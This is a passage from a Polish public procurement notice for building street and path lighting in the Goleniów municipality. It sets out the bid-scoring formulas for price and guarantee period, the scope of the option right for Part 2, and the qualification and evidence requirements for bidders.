możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 40,00 pkt.<br/><br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawiony niżej wzór: <br/> <br/>Wartość punktowa (C1) = C1 min/ C1bad x 40<br/> <br/>gdzie: <br/>C1min - cena brutto za wykonanie zamówienia podstawowego najniższa spośród wszystkich ofert <br/>C1bad - cena brutto za wykonanie zamówienia podstawowego podana w ofercie badanej<br/>40 - maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie kryterium; <br/> <br/>ad. b) Sposób obliczenia punktów dla kryterium cena oferty za wykonanie zamówienia objętego prawem opcji (C2):<br/><br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 20,00 pkt.<br/><br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawiony niżej wzór: <br/><br/> <br/>Wartość punktowa (C2) = C2min/ C2bad x 20<br/> <br/><br/>gdzie: <br/>C2min - cena brutto za wykonanie zamówienia objętego prawem opcji najniższa spośród wszystkich ofert<br/>C2bad - cena brutto za wykonanie zamówienia objętego prawem opcji podana w ofercie badanej<br/>20 - maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie kryterium; <br/> <br/>Ad c) Sposób obliczenia punktów dla kryterium wydłużenie okres gwarancji i rękojmi (G):<br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 40,00 pkt.<br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawione niżej wzór w oparciu o zaoferowany okres gwarancji i rękojmi, który należy podać w miesiącach w formularzu ofertowym (zał. nr 1.1. do SWZ ): <br/> <br/>Wartość punktowa (G) = Gbad/ Gmax x 40<br/> <br/>gdzie: <br/>Gmax – najdłuższy okres gwarancji i rękojmi spośród wszystkich ofert<br/>Gbad – okres gwarancji i rękojmi podany w ofercie badanej<br/>40 - maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie kryterium; <br/><br/>Wymagany minimalny przez Zamawiającego okres gwarancji i rękojmi wynosi 36 miesięcy. <br/>Maksymalny okres gwarancji i rękojmi wynosi 60 miesięcy. <br/><br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy do oceny ofert zostanie przyjęty okres 60 miesięcy. Brak wskazania w ofercie (w formularzu ofertowym) okresu gwarancji będzie równoznaczny z zaoferowaniem 36 miesięcy, za które Wykonawca otrzyma 0 pkt.<br/><br/>W przypadku gdy Wykonawca zaoferuje okres gwarancji krótszy niż 36 miesięcy, jego oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5) ustawy Pzp jako oferta, której treść jest niezgodna z warunkami zamówienia.<br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>Łączna wartość punktowa= wartość punktowa „C1” (cena oferty za wykonanie zamówienia podstawowego) + wartość punktowa „C2” (cena oferty za wykonanie zamówienia objętego prawem opcji) + wartość punktowa „G” (wydłużenie okresu gwarancji i rękojmi).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest zadanie inwestycyjne pn.: „Wykonanie oświetlenia ciągów komunikacyjnych w Gminie Goleniów” w tym wykonanie wszystkich prac prowadzących do osiągnięcia stanu zgodnego z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót budowlanych, SWZ oraz projektowanymi postanowieniami umowy w sprawie zamówienia publicznego.<br/>2. Zamawiający dokonał podziału zamówienia na 2 części:<br/>Część nr 1: „Wykonanie oświetlenia ciągów komunikacyjnych na terenach wiejskich Gminy Goleniów”<br/>Część nr 2: „Wykonanie oświetlenia ciągów komunikacyjnych w mieście Goleniów”<br/>3. Zakres przedmiotu zamówienia do wykonania w ramach części nr 2 obejmuje:<br/><br/>1)	zamawiający przewiduje, że na etapie realizacji zamówienia, będzie korzystał z prawa opcji. Zgodnie z regulacjami ustawowymi prawo opcji jest uprawnieniem Zamawiającego, a nie obowiązkiem do realizacji pełnego zakresu przedmiotu zamówienia tj. z prawem opcji. <br/><br/>2)	minimalny poziom zamówienia, który Zamawiający planuje zrealizować w terminie obowiązywania umowy czyli ZAMÓWIENIE PODSTAWOWE obejmuje budowę oświetlenia ulicznego n/w lokalizacjach:<br/><br/>a)	skrzyżowanie ul. Jagiełły i ul. Słowackiego,<br/>b)	ul. Kilińskiego - droga do szkoły na działce: 67/3 obręb ew. Goleniów-6 oraz na działce: 452/8 obręb ew. Goleniów-5 w m. Goleniów, <br/>c)	ścieżka rowerowa na ul. Spacerowej.<br/><br/>3) zamówienie z użyciem PRAWA OPCJI to zamówienie w ramach którego Zamawiający dopuszcza możliwość zwiększenia zamówienia podstawowego o dodatkowe ilości robót budowlanych, zgodnie z cenami wykazanymi przez Wykonawcę w Formularzu Cenowym, stanowiącym załącznik nr 1B do SWZ. Zamówienie podstawowe (opisane szczegółowo w ppkt 2) może ulec zwiększeniu o prawo opcji, które obejmuje budowę oświetlenia ulicznego n/w lokalizacjach:<br/>a)	ul. Starzyńskiego,<br/>b)	ul. Chrobrego i pętla autobusowa,<br/>c)	ul. Zacisze<br/>4)	zamawiający zastrzega sobie możliwość skorzystania z prawa opcji w niepełnym zakresie tzn. w ramach PRAWA OPCJI Zamawiający może zlecić – według własnego uznania – wykonanie budowy oświetlenia ulicznego w jednej, kilku lub wszystkich lokalizacjach, o których mowa w powyższym ppkt 3) lit. a) - c).<br/>5)	prawo opcji realizowane będzie na takich samych warunkach jak zamówienie podstawowe.<br/>6)	cena robót budowlanych zamawianych w ramach prawa opcji zostanie określona przez Wykonawcę w formularzu cenowym, stanowiącym załącznik nr 1B do SWZ, który zostanie złożony wraz z ofertą. Łączna cena za zamówienie objęte prawem opcji określone przez Wykonawcę w formularzu ofertowym, stanowiącym załącznik nr 1.2. do SWZ ma wynikać z jej obliczenia w formularzu cenowym, stanowiącym załącznik nr 1 B do SWZ.<br/>7)	Zamawiający uprawniony będzie do skorzystania z prawa opcji przez okres obowiązywania umowy, wobec tego jeśli przed upływem terminu na jaki została zawarta umowa, zostaną zrealizowane roboty budowlane przewidziane w ramach zamówienia podstawowego, Zamawiający będzie mógł zamawiać dalej, aż do wykorzystania wszystkich robót budowlanych przewidzianych jako opcja.<br/>8)	o zamiarze skorzystania z prawa opcji Zamawiający poinformuje Wykonawcę odrębnym pismem/oświadczeniem.<br/>9)	w przypadku, gdy Zamawiający nie skorzysta z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu. Warunkiem skorzystania z prawa opcji będzie posiadanie w budżecie środków finansowych na realizację dalszej budowy oświetlenia ciągów komunikacyjnych.<br/>10)	postanowienia SWZ odnoszące się do ZAMÓWIENIA PODSTAWOWEGO przedmiotu zamówienia znajdują odpowiednie zastosowanie do zamówienia objętego prawem opcji.<br/>4. Dalszy, szczegółowy opis przedmiotu zamówienia określono w SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45316100-6 - Instalowanie urządzeń oświetlenia zewnętrznego</p> <p class="mb-0">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) zamówienie z użyciem PRAWA OPCJI to zamówienie w ramach którego Zamawiający dopuszcza możliwość zwiększenia zamówienia podstawowego o dodatkowe ilości robót budowlanych, zgodnie z cenami wykazanymi przez Wykonawcę w Formularzu Cenowym, stanowiącym załącznik nr 1B do SWZ. Zamówienie podstawowe (opisane szczegółowo w ppkt 2) może ulec zwiększeniu o prawo opcji, które obejmuje budowę oświetlenia ulicznego n/w lokalizacjach:<br/>a)	ul. Starzyńskiego,<br/>b)	ul. Chrobrego i pętla autobusowa,<br/>c)	ul. Zacisze<br/>2)	zamawiający zastrzega sobie możliwość skorzystania z prawa opcji w niepełnym zakresie tzn. w ramach PRAWA OPCJI Zamawiający może zlecić – według własnego uznania – wykonanie budowy oświetlenia ulicznego w jednej, kilku lub wszystkich lokalizacjach, o których mowa w powyższym ppkt 3) lit. a) - c).<br/>3)	prawo opcji realizowane będzie na takich samych warunkach jak zamówienie podstawowe.<br/>4)	cena robót budowlanych zamawianych w ramach prawa opcji zostanie określona przez Wykonawcę w formularzu cenowym, stanowiącym załącznik nr 1B do SWZ, który zostanie złożony wraz z ofertą. Łączna cena za zamówienie objęte prawem opcji określone przez Wykonawcę w formularzu ofertowym, stanowiącym załącznik nr 1.2. do SWZ ma wynikać z jej obliczenia w formularzu cenowym, stanowiącym załącznik nr 1 B do SWZ.<br/>5)	Zamawiający uprawniony będzie do skorzystania z prawa opcji przez okres obowiązywania umowy, wobec tego jeśli przed upływem terminu na jaki została zawarta umowa, zostaną zrealizowane roboty budowlane przewidziane w ramach zamówienia podstawowego, Zamawiający będzie mógł zamawiać dalej, aż do wykorzystania wszystkich robót budowlanych przewidzianych jako opcja.<br/>6)	o zamiarze skorzystania z prawa opcji Zamawiający poinformuje Wykonawcę odrębnym pismem/oświadczeniem.<br/>7)	w przypadku, gdy Zamawiający nie skorzysta z prawa opcji, Wykonawcy nie przysługują żadne roszczenia z tego tytułu. Warunkiem skorzystania z prawa opcji będzie posiadanie w budżecie środków finansowych na realizację dalszej budowy oświetlenia ciągów komunikacyjnych.<br/>8)	postanowienia SWZ odnoszące się do ZAMÓWIENIA PODSTAWOWEGO przedmiotu zamówienia znajdują odpowiednie zastosowanie do zamówienia objętego prawem opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">160 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Prawo zamówień publicznych, polegających na powtórzeniu podobnych robót budowlanych w zakresie do 30 % wartości zamówienia podstawowego, które są przedmiotem niniejszego postępowania i są zgodne z przedmiotem zamówienia podstawowego. Pozycje z przedmiaru robót opisują rodzaj robót jakie Zamawiający przewiduje do realizacji w ramach powtórzenia podobnych robót. Podstawą do negocjacji, w szczególności ceny za powtórzone podobne roboty, będzie kosztorys ofertowy Wykonawcy złożony w niniejszym postępowaniu. Warunki powtórzonego zamówienia będą takie same jak zapisane w niniejszej SWZ.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty najkorzystniejszej w ramach części nr 2, zamawiający będzie się kierował następującymi kryteriami:<br/>a)	cena oferty za wykonanie zamówienia podstawowego (C1) – 35 pkt<br/>b)	cena oferty za wykonanie zamówienia objętego prawem opcji (C2)- 25 pkt<br/>c)	wydłużenie okresu gwarancji i rękojmi (G) -40 pkt<br/><br/>W odniesieniu do wykonawców, których oferty nie podlegają odrzuceniu dokonana zostanie ocena oferty w następujący sposób:<br/><br/>ad. a) Sposób obliczenia punktów dla kryterium cena oferty za wykonanie zamówienia podstawowego (C1):<br/><br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 35,00 pkt.<br/><br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawiony niżej wzór: <br/><br/><br/> <br/>Wartość punktowa (C1) = C1min/ C1bad x 35<br/> <br/><br/>gdzie: <br/>C1min - cena brutto za wykonanie zamówienia podstawowego najniższa spośród wszystkich ofert <br/>C1bad - cena brutto za wykonanie zamówienia podstawowego podana w ofercie badanej<br/>35 - maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie kryterium; <br/> <br/>ad. b) Sposób obliczenia punktów dla kryterium cena oferty za wykonanie zamówienia objętego prawem opcji (C2):<br/><br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 25,00 pkt.<br/><br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawiony niżej wzór: <br/><br/><br/> <br/>Wartość punktowa (C2) = C2min/ C2bad x 25<br/> <br/><br/>gdzie: <br/>C2min - cena brutto za wykonanie zamówienia objętego prawem opcji najniższa spośród wszystkich ofert<br/>C2bad - cena brutto za wykonanie zamówienia objętego prawem opcji podana w ofercie badanej<br/>25 - maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie kryterium; <br/> <br/>Ad c) Sposób obliczenia punktów dla kryterium wydłużenie okres gwarancji i rękojmi (G):<br/><br/>Maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 40,00 pkt.<br/><br/>Ocena ofert zostanie przeprowadzona w oparciu o przedstawione niżej wzór w oparciu o zaoferowany okres gwarancji i rękojmi, który należy podać w miesiącach w formularzu ofertowym (zał. nr 1.2. do SWZ ): <br/> <br/>Wartość punktowa (G) = Gbad/ Gmax x 40<br/> <br/>gdzie: <br/>Gmax – najdłuższy okres gwarancji i rękojmi spośród wszystkich ofert<br/>Gbad – okres gwarancji i rękojmi podany w ofercie badanej<br/>40 - maksymalna ilość punktów możliwa do przydzielenia w toku oceny w obrębie kryterium; <br/><br/>Wymagany minimalny przez Zamawiającego okres gwarancji i rękojmi wynosi 36 miesięcy. <br/>Maksymalny okres gwarancji i rękojmi wynosi 60 miesięcy. <br/><br/>Jeżeli Wykonawca zaoferuje okres gwarancji dłuższy niż 60 miesięcy do oceny ofert zostanie przyjęty okres 60 miesięcy. Brak wskazania w ofercie (w formularzu ofertowym) okresu gwarancji będzie równoznaczny z zaoferowaniem 36 miesięcy, za które Wykonawca otrzyma 0 pkt.<br/><br/>W przypadku gdy Wykonawca zaoferuje okres gwarancji krótszy niż 36 miesięcy, jego oferta zostanie odrzucona na podstawie art. 226 ust. 1 pkt 5) ustawy Pzp jako oferta, której treść jest niezgodna z warunkami zamówienia.<br/><br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/>Łączna wartość punktowa= wartość punktowa „C1” (cena oferty za wykonanie zamówienia podstawowego) + wartość punktowa „C2” (cena oferty za wykonanie zamówienia objętego prawem opcji) + wartość punktowa „G” (wydłużenie okresu gwarancji i rękojmi).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia publicznego w ramach części nr 1 i części nr 2, mogą ubiegać się wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w rozdziale 12 SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu:<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>2.1	W ramach części nr 1:<br/>2.1.1	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>2.1.2	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>2.1.3	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>2.1.4	zdolności technicznej lub zawodowej:<br/>1) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie doświadczenia tj., że w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie co najmniej dwie roboty budowlane polegające na budowie lub/i przebudowie oświetlenia ciągów komunikacyjnych o wartości robót minimum 100 000,00 złotych łącznie z podatkiem VAT za każdą z tych dwóch robót.<br/>Wykonawca nie może sumować wartości kilku robót budowlanych o mniejszym zakresie dla uzyskania wymaganych wartości porównywalnych.<br/>Definicje budowy, przebudowy lub remontu należy rozumieć zgodnie z definicjami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333, 2127, 2320, z 2021 r. poz.11)<br/>2) O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie dysponowania następującymi osobami zdolnymi do wykonania zamówienia:<br/>a) Kierownik budowy- minimalne wymagania: <br/>•	kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi odpowiadające przedmiotowi zamówienia w specjalności sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2017 r. poz. 1332, 1529 z późn. zm.) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>Na podstawie art. 104 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz. U. z 2020 r. poz. 1333 ze zm.) osoby, które, przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania.<br/>Ponadto zgodnie z art. 12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych, tj. ustawie z dnia 22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2018r. poz. 2272 ze zm.) oraz ustawie z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2016 poz. 1725 ze zm.).<br/>2.2	W ramach części nr 2:<br/>2.2.1	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>2.2.2	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>2.2.3	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia własnego, o którym mowa w rozdziale 14 SWZ.<br/>2.2.4	zdolności technicznej lub zawodowej:<br/>1) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie doświadczenia tj., że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonali należycie co najmniej co najmniej dwie roboty budowlane polegające na budowie lub/i przebudowie oświetlenia ciągów komunikacyjnych o wartości robót minimum 100 000,00 złotych łącznie z podatkiem VAT za każdą z tych dwóch robót.<br/>Wykonawca nie może sumować wartości kilku robót budowlanych o mniejszym zakresie dla uzyskania wymaganych wartości porównywalnych.<br/>Definicje budowy, przebudowy lub remontu należy rozumieć zgodnie z definicjami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2020 r. poz. 1333, 2127, 2320, z 2021 r. poz.11)<br/>2) O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą minimalne poziomy zdolności w zakresie dysponowania następującymi osobami zdolnymi do wykonania zamówienia:<br/>a) Kierownik budowy- minimalne wymagania: <br/>•	kwalifikacje zawodowe: uprawnienia budowlane do kierowania robotami budowlanymi odpowiadające przedmiotowi zamówienia w specjalności sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (t.j. Dz.U. z 2017 r. poz. 1332, 1529 z późn. zm.) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>Na podstawie art. 104 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz. U. z 2020 r. poz. 1333 ze zm.) osoby, które, przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania.<br/>Ponadto zgodnie z art. 12 a ustawy z dnia 7 lipca 1994 r. Prawo budowlane samodzielne funkcje techniczne w budownictwie mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych, tj. ustawie z dnia 22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2018r. poz. 2272 ze zm.) oraz ustawie z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2016 poz. 1725 ze zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>1.1 W ramach części nr 1:<br/>a) oświadczenia o braku podstaw do wykluczenia z postępowania – zgodnie z załącznikiem nr 3.1 do SWZ.<br/>1.2 W ramach części nr 2:<br/>a) oświadczenia o braku podstaw do wykluczenia z postępowania – zgodnie z załącznikiem nr 3.2 do SWZ.<br/>2. Oświadczenia, o którym mowa w pkt 1., potwierdzające brak podstaw do wykluczenia odpowiednio na dzień składania ofert, tymczasowo zastępują wymagane przez Zamawiającego podmiotowe środki dowodowe. <br/>3. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na ich dzień złożenia. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>3.1. W ramach części nr 1:<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zgodnie z załącznikiem nr 8.1 do SWZ;<br/>3.2. W ramach części nr 2:<br/>1) Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – zgodnie z załącznikiem nr 8.2 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>1.1 W ramach części nr 1:<br/>a) oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 2.1 do SWZ;<br/>1.2. W ramach części nr 2:<br/>a) oświadczenie o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 2.2 do SWZ;<br/>2. Oświadczenia, o którym mowa w pkt 1 , potwierdzające spełnianie warunków udziału w postępowaniu odpowiednio na dzień składania ofert, tymczasowo zastępują wymagane przez Zamawiającego podmiotowe środki dowodowe. <br/>3. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków dowodowych, aktualnych na ich dzień złożenia.<br/>3.1. Podmiotowe środki dowodowe wymagane od wykonawcy w ramach części nr 1 obejmują:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty- zgodnie z załącznikiem nr 5.1 do SWZ.<br/>W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jedno wspólne w/w oświadczenie.<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z załącznikiem nr 6.1 do SWZ.<br/>W przypadku składania oferty wspólnej wykonawcy składający ofertę wspólną składają jedno wspólne w/w oświadczenie.<br/>3.2. Podmiotowe środki dowodowe wymagane od wykonawcy w ramach części nr 2 obejmują:<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, 